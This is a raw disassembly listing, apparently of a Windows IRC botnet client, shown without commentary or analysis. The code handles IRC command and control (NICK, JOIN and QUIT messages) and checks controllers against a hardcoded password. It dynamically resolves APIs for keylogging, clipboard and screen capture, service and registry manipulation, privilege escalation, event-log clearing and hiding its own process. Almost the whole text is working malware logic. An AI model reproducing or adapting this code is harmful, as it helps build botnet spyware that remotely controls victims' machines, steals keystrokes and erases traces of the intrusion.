push offset asc_429EFC ; "-"
loc_4091FA: ; CODE XREF: sub_401ACD+7726�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz loc_406C22
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409869
add esp, 14h
jmp loc_406C22
; ---------------------------------------------------------------------------
loc_409233: ; CODE XREF: sub_401ACD+3EF5�j
; sub_401ACD+3F0C�j
push ebx ; int
push ebx ; int
push edi ; Str2
push [ebp+var_4] ; int
push ebx ; Str
push [ebp+arg_4] ; int
call sub_419C09
add esp, 18h
cmp eax, 1
push edi
jnz short loc_409255
push offset unk_429EDC
jmp loc_406BEF
; ---------------------------------------------------------------------------
loc_409255: ; CODE XREF: sub_401ACD+777C�j
push offset unk_429EAC
jmp loc_406BEF
; ---------------------------------------------------------------------------
loc_40925F: ; CODE XREF: sub_401ACD+3EC7�j
; sub_401ACD+3EDE�j
push edi
call dword_4CBA14 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+var_2D8], eax
jz short loc_4092A2
push 2
lea eax, [ebp+var_2D8]
push 4
push eax
call dword_4CB98C ; gethostbyaddr
cmp eax, ebx
jz short loc_4092BD
push dword ptr [eax]
loc_409288: ; CODE XREF: sub_401ACD+77EE�j
push edi
lea eax, [ebp+Dst]
push offset asc_429E8C ; "-"
push eax ; Dest
call _sprintf
loc_40929A: ; CODE XREF: sub_401ACD+76F5�j
add esp, 10h
jmp loc_406BFE
; ---------------------------------------------------------------------------
loc_4092A2: ; CODE XREF: sub_401ACD+77A2�j
push edi
call dword_4CBA58 ; gethostbyname
cmp eax, ebx
jz short loc_4092BD
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call dword_4CBA60 ; inet_ntoa
push eax
jmp short loc_409288
; ---------------------------------------------------------------------------
loc_4092BD: ; CODE XREF: sub_401ACD+77B7�j
; sub_401ACD+77DE�j
push offset unk_429E64
jmp loc_4084F5
; ---------------------------------------------------------------------------
loc_4092C7: ; CODE XREF: sub_401ACD+3E99�j
; sub_401ACD+3EB0�j
push 7Fh ; Count
push edi ; Source
push [ebp+arg_14] ; Dest
call _strncpy
add esp, 0Ch
push edi
push offset unk_429E40
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_4092E0: ; CODE XREF: sub_401ACD+3E6B�j
; sub_401ACD+3E82�j
push 5
push ebx
push ebx
push edi
push offset aOpen ; "open"
push ebx
call dword_4CB940
test eax, eax
push edi
jz short loc_409300
push offset unk_429E20
jmp loc_406BEF
; ---------------------------------------------------------------------------
loc_409300: ; CODE XREF: sub_401ACD+7827�j
push offset unk_429DFC
jmp loc_406BEF
; ---------------------------------------------------------------------------
loc_40930A: ; CODE XREF: sub_401ACD+3E3D�j
; sub_401ACD+3E54�j
mov al, [edi]
mov byte_429094, al
movsx eax, byte ptr [edi]
push eax
push offset unk_429DD8
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_40931F: ; CODE XREF: sub_401ACD+3E0F�j
; sub_401ACD+3E26�j
push edi ; Str
call _atoi
test eax, eax
pop ecx
jle loc_409644
push edi ; Str
call _atoi
cmp eax, 400h
pop ecx
jge loc_409644
push ebx ; Str1
push ebx ; int
lea eax, [ebp+SubStr]
push 2 ; int
push eax ; Dest
call sub_40AE84
add esp, 10h
push eax
lea eax, [ebp+Dst]
push offset aNickS_0 ; "NICK %s"
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp loc_4088B1
; ---------------------------------------------------------------------------
loc_40936D: ; CODE XREF: sub_401ACD+3DE1�j
; sub_401ACD+3DF8�j
push edi ; Str
call _atoi
test eax, eax
pop ecx
jle loc_401F75
push edi ; Str
call _atoi
cmp eax, 400h
pop ecx
jge loc_401F75
push offset aQuitLater ; "QUIT :later\r\n"
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_43E91C[eax] ; int
call sub_409823
pop ecx
pop ecx
push 1F4h
call ds:dword_427080 ; Sleep
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_43E91C[eax]
call dword_4CBA6C ; closesocket
push [ebp+var_10]
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_43E924[eax]
call ds:dword_4270B4 ; TerminateThread
push edi ; Str
call _atoi
imul eax, 234h
push edi ; Str
mov dword_43E924[eax], ebx
call _atoi
imul eax, 234h
pop ecx
pop ecx
mov byte ptr dword_43E710[eax], bl
jmp loc_401F75
; ---------------------------------------------------------------------------
loc_409418: ; CODE XREF: sub_401ACD+3DB3�j
; sub_401ACD+3DCA�j
push edi ; Str2
push offset aAll ; "all"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_409447
call sub_40B583
cmp eax, ebx
jle short loc_40943D
push eax
push offset unk_429DAC
jmp loc_40723F
; ---------------------------------------------------------------------------
loc_40943D: ; CODE XREF: sub_401ACD+7963�j
push offset unk_429D84
jmp loc_403F8F
; ---------------------------------------------------------------------------
loc_409447: ; CODE XREF: sub_401ACD+795A�j
mov eax, [ebp+var_AC]
lea edi, [eax+1]
cmp edi, 20h
jnb loc_401F75
lea eax, [ebp+edi*4+var_90]
mov [ebp+File], eax
loc_409463: ; CODE XREF: sub_401ACD+7A07�j
mov eax, [ebp+File]
mov esi, [eax]
cmp esi, ebx
jz loc_401F75
push esi ; Str
call _atoi
push eax
call sub_40B4F5
pop ecx
pop ecx
test eax, eax
push esi
jz short loc_40948A
push offset unk_429D60
jmp short loc_40948F
; ---------------------------------------------------------------------------
loc_40948A: ; CODE XREF: sub_401ACD+79B4�j
push offset asc_429D34 ; "-"
loc_40948F: ; CODE XREF: sub_401ACD+79BB�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_4094BF
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409869
add esp, 14h
loc_4094BF: ; CODE XREF: sub_401ACD+79D4�j
lea eax, [ebp+Dst]
push eax
call sub_415D38
add [ebp+File], 4
inc edi
cmp edi, 20h
pop ecx
jb short loc_409463
jmp loc_401F75
; ---------------------------------------------------------------------------
loc_4094DB: ; CODE XREF: sub_401ACD+3D85�j
; sub_401ACD+3D9C�j
cmp [ebp+var_C], ebx
jz loc_409644
push edi ; SubStr
push [ebp+var_C] ; Str
call _strstr
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_409644
push esi ; Args
push offset aS ; "%s\r\n"
push [ebp+arg_4] ; int
call sub_409823
add esp, 0Ch
push esi
push offset unk_429D1C
jmp loc_40963D
; ---------------------------------------------------------------------------
loc_409515: ; CODE XREF: sub_401ACD+3D57�j
; sub_401ACD+3D6E�j
push edi ; Args
push offset aPartS_1 ; "PART %s\r\n"
push [ebp+arg_4] ; int
call sub_409823
add esp, 0Ch
push edi
push offset unk_429CFC
jmp loc_40963D
; ---------------------------------------------------------------------------
loc_409531: ; CODE XREF: sub_401ACD+3D29�j
; sub_401ACD+3D40�j
push [ebp+esi+Format]
push edi ; Args
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4] ; int
call sub_409823
add esp, 10h
push edi
push offset unk_429CDC
jmp loc_40963D
; ---------------------------------------------------------------------------
loc_409554: ; CODE XREF: sub_401ACD+3CFB�j
; sub_401ACD+3D12�j
push edi ; Args
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4] ; int
call sub_409823
add esp, 0Ch
push edi
push offset unk_429CB8
jmp loc_40963D
; ---------------------------------------------------------------------------
loc_409570: ; CODE XREF: sub_401ACD+3123�j
; sub_401ACD+313A�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+arg_4] ; int
call sub_409823
pop ecx
lea eax, [ebp+Dst]
pop ecx
push edi
push offset unk_429C98 ; Format
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax
call sub_415D38
push edi ; Str
call _atoi
add esp, 14h
loc_4095A6: ; CODE XREF: sub_401ACD+7B23�j
push eax
call ds:dword_427080 ; Sleep
loc_4095AD: ; CODE XREF: sub_401ACD+2A5F�j
xor eax, eax
jmp loc_401F78
; ---------------------------------------------------------------------------
loc_4095B4: ; CODE XREF: sub_401ACD+30F5�j
; sub_401ACD+310C�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+arg_4] ; int
call sub_409823
pop ecx
lea eax, [ebp+Dst]
pop ecx
push edi
push offset unk_429C70 ; Format
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax
call sub_415D38
push edi ; Str
call _atoi
add esp, 14h
imul eax, 3E8h
jmp short loc_4095A6
; ---------------------------------------------------------------------------
loc_4095F2: ; CODE XREF: sub_401ACD+EAD�j
; sub_401ACD+EC2�j
push dword ptr [ebp+esi+Args] ; Str1
xor eax, eax
cmp [ebp+var_8F0], bl
setnz al
push eax ; int
lea eax, [ebp+Str1]
push dword_42909C ; int
push eax ; Dest
call sub_40AE84
add esp, 10h
lea eax, [ebp+Str1]
push eax ; Args
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4] ; int
call sub_409823
add esp, 0Ch
lea eax, [ebp+Str1]
push eax ; Args
push offset unk_429C4C ; Format
loc_40963D: ; CODE XREF: sub_401ACD+6FCC�j
; sub_401ACD+75F1�j ...
call sub_415DAC
pop ecx
loc_409643: ; CODE XREF: sub_401ACD+6BD8�j
pop ecx
loc_409644: ; CODE XREF: sub_401ACD+63D�j
; sub_401ACD+649�j ...
mov eax, [ebp+File]
jmp loc_401F78
; ---------------------------------------------------------------------------
loc_40964C: ; CODE XREF: sub_401ACD+A98�j
; sub_401ACD+AAD�j
mov esi, dword ptr [ebp+esi+Args]
cmp esi, ebx
mov [ebp+arg_20], esi
jz loc_401F75
cmp [ebp+var_A4], ebx
jnz loc_401F75
push offset Delim ; "!"
push [ebp+var_90] ; Str
call _strtok
mov esi, eax
push offset word_4CB88C ; Delim
push ebx ; Str
inc esi
call _strtok
push offset asc_429C48 ; "~"
push eax ; Str
call _strtok
push [ebp+arg_20] ; Str2
mov edi, eax
push offset aCool ; "cool"
call _strcmp
add esp, 20h
test eax, eax
jz short loc_4096EB
lea eax, [ebp+var_C4]
push edi
push eax
lea eax, [ebp+var_C4]
push eax ; Args
push offset aNoticeSPassAut ; "NOTICE %s :Pass auth failed (%s!%s).\r\n"
push [ebp+arg_4] ; int
call sub_409823
add esp, 14h
lea eax, [ebp+var_C4]
push eax ; Args
push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"...
push [ebp+arg_4] ; int
call sub_409823
add esp, 0Ch
push edi
push esi
push offset unk_429BC8
jmp loc_4023EE
; ---------------------------------------------------------------------------
loc_4096EB: ; CODE XREF: sub_401ACD+7BDA�j
mov [ebp+File], offset off_42915C
loc_4096F2: ; CODE XREF: sub_401ACD+7C41�j
mov eax, [ebp+File]
push edi
push dword ptr [eax]
call sub_40B713
pop ecx
test eax, eax
pop ecx
jnz short loc_409752
add [ebp+File], 4
cmp [ebp+File], offset off_429160
jb short loc_4096F2
lea eax, [ebp+var_C4]
push edi
push eax
lea eax, [ebp+var_C4]
push eax ; Args
push offset aNoticeSHostAut ; "NOTICE %s :Host Auth failed (%s!%s).\r\n"
push [ebp+arg_4] ; int
call sub_409823
add esp, 14h
lea eax, [ebp+var_C4]
push eax ; Args
push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"...
push [ebp+arg_4] ; int
call sub_409823
add esp, 0Ch
push edi
push esi
push offset unk_429B74
jmp loc_4023EE
; ---------------------------------------------------------------------------
loc_409752: ; CODE XREF: sub_401ACD+7C34�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_409757: ; CODE XREF: sub_401ACD+7CB4�j
cmp [ebp+arg_20], ebx
jz loc_401F75
cmp [edi], bl
jnz short loc_409777
push [ebp+arg_20] ; Str2
push offset aCool ; "cool"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_409788
loc_409777: ; CODE XREF: sub_401ACD+7C95�j
inc esi
add edi, 80h
cmp esi, 3
jl short loc_409757
jmp loc_401F75
; ---------------------------------------------------------------------------
loc_409788: ; CODE XREF: sub_401ACD+7CA8�j
shl esi, 7
add esi, [ebp+arg_18]
lea eax, [ebp+var_E04]
push 7Fh ; Count
push eax ; Source
push esi ; Dest
call _strncpy
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_4097BF
push ebx ; int
push [ebp+var_4] ; int
push offset unk_429B54 ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409869
add esp, 14h
loc_4097BF: ; CODE XREF: sub_401ACD+7CD6�j
lea eax, [ebp+var_C4]
push eax ; Args
push offset unk_429B34 ; Format
loc_4097CB: ; CODE XREF: sub_401ACD+595�j
; sub_401ACD+2889�j ...
call sub_415DAC
loc_4097D0: ; CODE XREF: sub_401ACD+1B81�j
pop ecx
loc_4097D1: ; CODE XREF: sub_401ACD+24FD�j
pop ecx
jmp loc_401F75
; ---------------------------------------------------------------------------
loc_4097D7: ; CODE XREF: sub_401ACD+20E�j
; sub_401ACD+223�j
push [ebp+Source] ; Args
push offset aUserhostS ; "USERHOST %s\r\n"
push [ebp+arg_4] ; int
call sub_409823
add esp, 0Ch
push offset aXI ; "-x+i"
push [ebp+Source] ; Args
push offset aModeSS_0 ; "MODE %s %s\r\n"
push [ebp+arg_4] ; int
call sub_409823
add esp, 10h
push [ebp+arg_C]
push [ebp+arg_8] ; Args
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4] ; int
call sub_409823
add esp, 10h
mov dword_4CB884, edi
jmp loc_401D6A
sub_401ACD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_409823(int,char *Format,char Args)
sub_409823 proc near ; CODE XREF: sub_401955+3D�p
; sub_401ACD+1CB�p ...
Dest = byte ptr -200h
arg_0 = dword ptr 8
Format = dword ptr 0Ch
Args = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
lea eax, [ebp+Args]
push eax ; Args
lea eax, [ebp+Dest]
push [ebp+Format] ; Format
push 200h ; Count
push eax ; Dest
call __vsnprintf
add esp, 10h
lea eax, [ebp+Dest]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push [ebp+arg_0]
call dword_4CBA24 ; send
leave
retn
sub_409823 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_409869(int,char *Str,int,int,int)
sub_409869 proc near ; CODE XREF: sub_401ACD+506�p
; sub_401ACD+134E�p ...
var_400 = byte ptr -400h
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 400h
cmp [ebp+arg_C], 0
push esi
push edi
mov edi, offset aNotice ; "NOTICE"
jnz short loc_409884
mov edi, offset aPrivmsg ; "PRIVMSG"
loc_409884: ; CODE XREF: sub_409869+14�j
push edi ; Str
call _strlen
push [ebp+Str] ; Str
mov esi, 1FAh
sub esi, eax
call _strlen
pop ecx
sub esi, eax
pop ecx
lea eax, [ebp+var_400]
push [ebp+arg_8]
push offset aS_6 ; "%s"
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+Dest]
push [ebp+Str]
push edi
push offset aSSS_1 ; "%s %s :%s\r\n"
push eax ; Dest
call _sprintf
add esp, 14h
lea eax, [ebp+Dest]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push [ebp+arg_0]
call dword_4CBA24 ; send
cmp [ebp+arg_10], 0
pop edi
pop esi
jz short locret_409907
push 7D0h
call ds:dword_427080 ; Sleep
locret_409907: ; CODE XREF: sub_409869+91�j
leave
retn
sub_409869 endp
; =============== S U B R O U T I N E =======================================
sub_409909 proc near ; CODE XREF: WinMain(x,x,x,x)+4B�p
push ebx
push ebp
mov ebp, ds:dword_4270A4
push esi
push edi
push offset aKernel32_dll ; "kernel32.dll"
call ebp ; GetModuleHandleA
mov esi, ds:dword_4270C4
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_409A29
push offset aSeterrormode ; "SetErrorMode"
push edi
call esi ; GetProcAddress
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push edi
mov dword_4CBA80, eax
call esi ; GetProcAddress
push offset aProcess32first ; "Process32First"
push edi
mov dword_4CB9F4, eax
call esi ; GetProcAddress
push offset aProcess32next ; "Process32Next"
push edi
mov dword_4CB9D8, eax
call esi ; GetProcAddress
push offset aModule32first ; "Module32First"
push edi
mov dword_4CB8E8, eax
call esi ; GetProcAddress
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push edi
mov dword_4CB894, eax
call esi ; GetProcAddress
push offset aGetlogicaldriv ; "GetLogicalDriveStringsA"
push edi
mov dword_4CB8C4, eax
call esi ; GetProcAddress
push offset aGetdrivetypea ; "GetDriveTypeA"
push edi
mov dword_4CB93C, eax
call esi ; GetProcAddress
push offset aSearchpatha ; "SearchPathA"
push edi
mov dword_4CBA34, eax
call esi ; GetProcAddress
push offset aQueryperforman ; "QueryPerformanceCounter"
push edi
mov dword_4CBA90, eax
call esi ; GetProcAddress
push offset aQueryperform_0 ; "QueryPerformanceFrequency"
push edi
mov dword_4CB8F4, eax
call esi ; GetProcAddress
cmp dword_4CBA80, ebx
mov dword_4CB8DC, eax
jz short loc_409A07
cmp dword_4CB9F4, ebx
jz short loc_409A07
cmp dword_4CB9D8, ebx
jz short loc_409A07
cmp dword_4CB8E8, ebx
jz short loc_409A07
cmp dword_4CB8C4, ebx
jz short loc_409A07
cmp dword_4CB93C, ebx
jz short loc_409A07
cmp dword_4CBA34, ebx
jz short loc_409A07
cmp dword_4CBA90, ebx
jz short loc_409A07
cmp dword_4CB8F4, ebx
jz short loc_409A07
cmp eax, ebx
jnz short loc_409A11
loc_409A07: ; CODE XREF: sub_409909+B8�j
; sub_409909+C0�j ...
mov dword_4CBA94, 1
loc_409A11: ; CODE XREF: sub_409909+FC�j
push offset aRegisterservic ; "RegisterServiceProcess"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_4CBA0C, eax
jz short loc_409A3E
push 1
push ebx
call eax
jmp short loc_409A3E
; ---------------------------------------------------------------------------
loc_409A29: ; CODE XREF: sub_409909+1D�j
call ds:dword_427094 ; RtlGetLastWin32Error
mov dword_4CBA98, eax
mov dword_4CBA94, 1
loc_409A3E: ; CODE XREF: sub_409909+117�j
; sub_409909+11E�j
push offset aUser32_dll ; "user32.dll"
call ds:dword_4270C0 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_409B53
push offset aSendmessagea ; "SendMessageA"
push edi
call esi ; GetProcAddress
push offset aFindwindowa ; "FindWindowA"
push edi
mov dword_4CBA30, eax
call esi ; GetProcAddress
push offset aIswindow ; "IsWindow"
push edi
mov dword_4CB9E0, eax
call esi ; GetProcAddress
push offset aDestroywindow ; "DestroyWindow"
push edi
mov dword_4CB974, eax
call esi ; GetProcAddress
push offset aOpenclipboard ; "OpenClipboard"
push edi
mov dword_4CBA84, eax
call esi ; GetProcAddress
push offset aGetclipboardda ; "GetClipboardData"
push edi
mov dword_4CB9A4, eax
call esi ; GetProcAddress
push offset aCloseclipboard ; "CloseClipboard"
push edi
mov dword_4CB9C4, eax
call esi ; GetProcAddress
push offset aExitwindowsex ; "ExitWindowsEx"
push edi
mov dword_4CBA28, eax
call esi ; GetProcAddress
cmp dword_4CBA30, ebx
mov dword_4CB914, eax
jz short loc_409AF7
cmp dword_4CB9E0, ebx
jz short loc_409AF7
cmp dword_4CB974, ebx
jz short loc_409AF7
cmp dword_4CBA84, ebx
jz short loc_409AF7
cmp dword_4CB9A4, ebx
jz short loc_409AF7
cmp dword_4CB9C4, ebx
jz short loc_409AF7
cmp dword_4CBA28, ebx
jz short loc_409AF7
cmp eax, ebx
jnz short loc_409B01
loc_409AF7: ; CODE XREF: sub_409909+1B8�j
; sub_409909+1C0�j ...
mov dword_4CBA9C, 1
loc_409B01: ; CODE XREF: sub_409909+1EC�j
push offset aGetasynckeysta ; "GetAsyncKeyState"
push edi
call esi ; GetProcAddress
push offset aGetkeystate ; "GetKeyState"
push edi
mov dword_4CB9A0, eax
call esi ; GetProcAddress
push offset aGetwindowtexta ; "GetWindowTextA"
push edi
mov dword_4CB8A8, eax
call esi ; GetProcAddress
push offset aGetforegroundw ; "GetForegroundWindow"
push edi
mov dword_4CB970, eax
call esi ; GetProcAddress
cmp dword_4CB9A0, ebx
mov dword_4CB958, eax
jz short loc_409B5E
cmp dword_4CB8A8, ebx
jz short loc_409B5E
cmp dword_4CB970, ebx
jz short loc_409B5E
cmp eax, ebx
jnz short loc_409B68
jmp short loc_409B5E
; ---------------------------------------------------------------------------
loc_409B53: ; CODE XREF: sub_409909+144�j
call ds:dword_427094 ; RtlGetLastWin32Error
mov dword_4CBAA0, eax
loc_409B5E: ; CODE XREF: sub_409909+232�j
; sub_409909+23A�j ...
mov dword_4CBA9C, 1
loc_409B68: ; CODE XREF: sub_409909+246�j
push offset aAdvapi32_dll ; "advapi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_409D21
push offset aRegopenkeyexa ; "RegOpenKeyExA"
push edi
call esi ; GetProcAddress
push offset aRegcreatekeyex ; "RegCreateKeyExA"
push edi
mov dword_4CBA44, eax
call esi ; GetProcAddress
push offset aRegsetvalueexa ; "RegSetValueExA"
push edi
mov dword_4CB988, eax
call esi ; GetProcAddress
push offset aRegqueryvaluee ; "RegQueryValueExA"
push edi
mov dword_4CB9F8, eax
call esi ; GetProcAddress
push offset aRegdeletevalue ; "RegDeleteValueA"
push edi
mov dword_4CB8D4, eax
call esi ; GetProcAddress
push offset aRegclosekey ; "RegCloseKey"
push edi
mov dword_4CB938, eax
call esi ; GetProcAddress
push offset aOpeneventloga ; "OpenEventLogA"
push edi
mov dword_4CB9B0, eax
call esi ; GetProcAddress
push offset aCleareventloga ; "ClearEventLogA"
push edi
mov dword_4CB954, eax
call esi ; GetProcAddress
cmp dword_4CBA44, ebx
mov dword_4CB964, eax
jz short loc_409C11
cmp dword_4CB988, ebx
jz short loc_409C11
cmp dword_4CB9F8, ebx
jz short loc_409C11
cmp dword_4CB8D4, ebx
jz short loc_409C11
cmp dword_4CB938, ebx
jz short loc_409C11
cmp dword_4CB9B0, ebx
jnz short loc_409C1B
loc_409C11: ; CODE XREF: sub_409909+2DE�j
; sub_409909+2E6�j ...
mov dword_4CBAA4, 1
loc_409C1B: ; CODE XREF: sub_409909+306�j
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
mov dword_4CB9B8, eax
call esi ; GetProcAddress
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
mov dword_4CB990, eax
call esi ; GetProcAddress
cmp dword_4CB9B8, ebx
mov dword_4CBA40, eax
jz short loc_409C56
cmp dword_4CB990, ebx
jz short loc_409C56
cmp eax, ebx
jnz short loc_409C60
loc_409C56: ; CODE XREF: sub_409909+33F�j
; sub_409909+347�j
mov dword_4CBAA4, 1
loc_409C60: ; CODE XREF: sub_409909+34B�j
push offset aOpenscmanagera ; "OpenSCManagerA"
push edi
call esi ; GetProcAddress
push offset aOpenservicea ; "OpenServiceA"
push edi
mov dword_4CB9C8, eax
call esi ; GetProcAddress
push offset aStartservicea ; "StartServiceA"
push edi
mov dword_4CB8B0, eax
call esi ; GetProcAddress
push offset aControlservice ; "ControlService"
push edi
mov dword_4CB8B8, eax
call esi ; GetProcAddress
push offset aDeleteservice ; "DeleteService"
push edi
mov dword_4CB91C, eax
call esi ; GetProcAddress
push offset aCloseserviceha ; "CloseServiceHandle"
push edi
mov dword_4CB920, eax
call esi ; GetProcAddress
push offset aEnumservicesst ; "EnumServicesStatusA"
push edi
mov dword_4CB8CC, eax
call esi ; GetProcAddress
push offset aIsvalidsecurit ; "IsValidSecurityDescriptor"
push edi
mov dword_4CB994, eax
call esi ; GetProcAddress
cmp dword_4CB9C8, ebx
mov dword_4CB8BC, eax
jz short loc_409D04
cmp dword_4CB8B0, ebx
jz short loc_409D04
cmp dword_4CB8B8, ebx
jz short loc_409D04
cmp dword_4CB91C, ebx
jz short loc_409D04
cmp dword_4CB920, ebx
jz short loc_409D04
cmp dword_4CB8CC, ebx
jz short loc_409D04
cmp dword_4CB994, ebx
jz short loc_409D04
cmp eax, ebx
jnz short loc_409D0E
loc_409D04: ; CODE XREF: sub_409909+3C5�j
; sub_409909+3CD�j ...
mov dword_4CBAA4, 1
loc_409D0E: ; CODE XREF: sub_409909+3F9�j
push offset aGetusernamea ; "GetUserNameA"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_4CB8B4, eax
jnz short loc_409D36
jmp short loc_409D2C
; ---------------------------------------------------------------------------
loc_409D21: ; CODE XREF: sub_409909+26A�j
call ds:dword_427094 ; RtlGetLastWin32Error
mov dword_4CBAA8, eax
loc_409D2C: ; CODE XREF: sub_409909+416�j
mov dword_4CBAA4, 1
loc_409D36: ; CODE XREF: sub_409909+414�j
push offset aGdi32_dll ; "gdi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_409E02
push offset aCreatedca ; "CreateDCA"
push edi
call esi ; GetProcAddress
push offset aCreatedibsecti ; "CreateDIBSection"
push edi
mov dword_4CB9C0, eax
call esi ; GetProcAddress
push offset aCreatecompatib ; "CreateCompatibleDC"
push edi
mov dword_4CBA18, eax
call esi ; GetProcAddress
push offset aGetdevicecaps ; "GetDeviceCaps"
push edi
mov dword_4CBA20, eax
call esi ; GetProcAddress
push offset aGetdibcolortab ; "GetDIBColorTable"
push edi
mov dword_4CB9DC, eax
call esi ; GetProcAddress
push offset aSelectobject ; "SelectObject"
push edi
mov dword_4CB8F8, eax
call esi ; GetProcAddress
push offset aBitblt ; "BitBlt"
push edi
mov dword_4CB8A4, eax
call esi ; GetProcAddress
push offset aDeletedc ; "DeleteDC"
push edi
mov dword_4CBA1C, eax
call esi ; GetProcAddress
push offset aDeleteobject ; "DeleteObject"
push edi
mov dword_4CB890, eax
call esi ; GetProcAddress
cmp dword_4CB9C0, ebx
mov dword_4CB930, eax
jz short loc_409E0D
cmp dword_4CBA18, ebx
jz short loc_409E0D
cmp dword_4CBA20, ebx
jz short loc_409E0D
cmp dword_4CB9DC, ebx
jz short loc_409E0D
cmp dword_4CB8F8, ebx
jz short loc_409E0D
cmp dword_4CB8A4, ebx
jz short loc_409E0D
cmp dword_4CBA1C, ebx
jz short loc_409E0D
cmp dword_4CB890, ebx
jz short loc_409E0D
cmp eax, ebx
jnz short loc_409E17
jmp short loc_409E0D
; ---------------------------------------------------------------------------
loc_409E02: ; CODE XREF: sub_409909+438�j
call ds:dword_427094 ; RtlGetLastWin32Error
mov dword_4CBAB0, eax
loc_409E0D: ; CODE XREF: sub_409909+4B9�j
; sub_409909+4C1�j ...
mov dword_4CBAAC, 1
loc_409E17: ; CODE XREF: sub_409909+4F5�j
mov ebp, ds:dword_4270C0
push offset aWs2_32_dll ; "ws2_32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40A0D3
push offset aWsastartup ; "WSAStartup"
push edi
call esi ; GetProcAddress
push offset aWsasocketa ; "WSASocketA"
push edi
mov dword_4CB944, eax
call esi ; GetProcAddress
push offset aWsaasyncselect ; "WSAAsyncSelect"
push edi
mov dword_4CBA78, eax
call esi ; GetProcAddress
push offset a__wsafdisset ; "__WSAFDIsSet"
push edi
mov dword_4CB8E4, eax
call esi ; GetProcAddress
push offset aWsaioctl ; "WSAIoctl"
push edi
mov dword_4CB8C0, eax
call esi ; GetProcAddress
push offset aWsagetlasterro ; "WSAGetLastError"
push edi
mov dword_4CB980, eax
call esi ; GetProcAddress
push offset aWsacleanup ; "WSACleanup"
push edi
mov dword_4CB968, eax
call esi ; GetProcAddress
push offset aSocket ; "socket"
push edi
mov dword_4CB92C, eax
call esi ; GetProcAddress
push offset aIoctlsocket ; "ioctlsocket"
push edi
mov dword_4CBA54, eax
call esi ; GetProcAddress
push offset aConnect ; "connect"
push edi
mov dword_4CBA70, eax
call esi ; GetProcAddress
push offset aInet_ntoa ; "inet_ntoa"
push edi
mov dword_4CB97C, eax
call esi ; GetProcAddress
push offset aInet_addr ; "inet_addr"
push edi
mov dword_4CBA60, eax
call esi ; GetProcAddress
push offset aHtons ; "htons"
push edi
mov dword_4CBA14, eax
call esi ; GetProcAddress
push offset aHtonl ; "htonl"
push edi
mov dword_4CB9D4, eax
call esi ; GetProcAddress
push offset aNtohs ; "ntohs"
push edi
mov dword_4CB9D0, eax
call esi ; GetProcAddress
push offset aNtohl ; "ntohl"
push edi
mov dword_4CB904, eax
call esi ; GetProcAddress
push offset aSend_0 ; "send"
push edi
mov dword_4CB8FC, eax
call esi ; GetProcAddress
push offset aSendto ; "sendto"
push edi
mov dword_4CBA24, eax
call esi ; GetProcAddress
push offset aRecv ; "recv"
push edi
mov dword_4CBA38, eax
call esi ; GetProcAddress
push offset aRecvfrom ; "recvfrom"
push edi
mov dword_4CB9EC, eax
call esi ; GetProcAddress
mov dword_4CB9AC, eax
push offset aBind ; "bind"
push edi
call esi ; GetProcAddress
push offset aSelect ; "select"
push edi
mov dword_4CBA00, eax
call esi ; GetProcAddress
push offset aListen ; "listen"
push edi
mov dword_4CB9BC, eax
